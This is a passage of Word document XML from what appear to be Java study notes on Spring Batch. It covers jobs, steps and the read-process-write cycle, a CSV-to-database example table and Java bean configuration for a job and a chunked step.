          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9D0C0" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myStep</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epBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stepBuilders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA373C" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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temReader</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MyDTO</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reader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5B856" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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temProcessor</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MyDT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Entity</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processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D9648" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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temWriter</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MyEntity</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ri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D2B163B" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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stepBuilders</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myStep"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5900B99D" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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MyDT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Entity</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chunk</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00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD9042" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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ad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ader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3EDBF" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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ocess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ocessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F493F4" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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wri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writer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCA9C5" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA9B66" w14:textId="55EE413A" w:rsidR="00215039" w:rsidRPr="00CE4B95"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4222EC14" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EF625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0FCE02C">
          <v:rect id="_x0000_i2171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C5D09" w14:textId="77777777" w:rsidR="00131EF4" w:rsidRPr="00CE4B95" w:rsidRDefault="00131EF4" w:rsidP="00131EF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc196307959"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How spring batch works?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
    </w:p>
    <w:p w14:paraId="6734CA6F" w14:textId="19D6E443" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="001743AE">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pring Batch works by defining </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that consist of one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each step does a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read → process → write</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46E85A" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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BA12A53">
          <v:rect id="_x0000_i2172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4CB158" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">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pring Batch Core Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C3F22" w14:textId="66D2E729" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ob</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>A job is a container for steps and represents the entire batch process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EBDBD" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Each step defines a stage in the job: reading, processing, and writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1D2F4" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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temReader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Reads one item at a time from a data source (file, DB, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496A592" w14:textId="4C07139E" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>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temProcess</w:t>
      </w:r>
      <w:r w:rsidR="00E76A6A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Transforms the input data (e.g., validation, conversion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A9E17" w14:textId="4353AAD7" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ItemWriter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Writes processed data to a target (file, DB, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FC035" w14:textId="08026925" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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obRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Stores metadata about job execution (status, count, time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D81CD" w14:textId="33D82F00" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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obLauncher</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Triggers the job execution, can be from main class, REST API, or a scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9796D" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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0E1A936">
          <v:rect id="_x0000_i2173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514306E" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">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Read CSV → Process → Store to DB</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7"/>
        <w:gridCol w:w="1959"/>
        <w:gridCol w:w="2762"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="5AF5B92C" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429299AB" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="008A7AB5">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ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D1E0752" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="008A7AB5">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mponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="540B923B" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="008A7AB5">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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="2373CE84" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FCDC1BA" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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ep 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338DAFE6" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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latFileItemReader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DA1CE4A" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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ads rows from CSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="63C5791B" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC66B6E" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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ep 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53142DC2" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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emProcessor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482C3A4D" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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alidates and transforms data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="4C9531BF" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C3F88C" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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ep 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E22D060" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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dbcBatchItemWriter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A0D195" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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serts records into DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12A24687" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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C256E96">
          <v:rect id="_x0000_i2174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76787039" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">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Flowchart of Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD73766" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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obLauncher --&gt; Job --&gt; Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E750637" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C54BA" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D4364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gt; ItemReader --&gt; ItemProcessor --&gt; ItemWriter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB613A" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4364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102E9B">
          <v:rect id="_x0000_i2175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DB913" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">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nfiguration (Java-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD6908" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613241B" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myJob</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JobBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobBuilderFact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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ste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75D159A" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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jobBuilderFactory</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myJob"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191256BE" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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crementer</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unIdIncrementer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F96676D" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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l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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AA779" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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end</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC7B5EE" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B57BB" w14:textId="77777777" w:rsidR="008A7AB5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
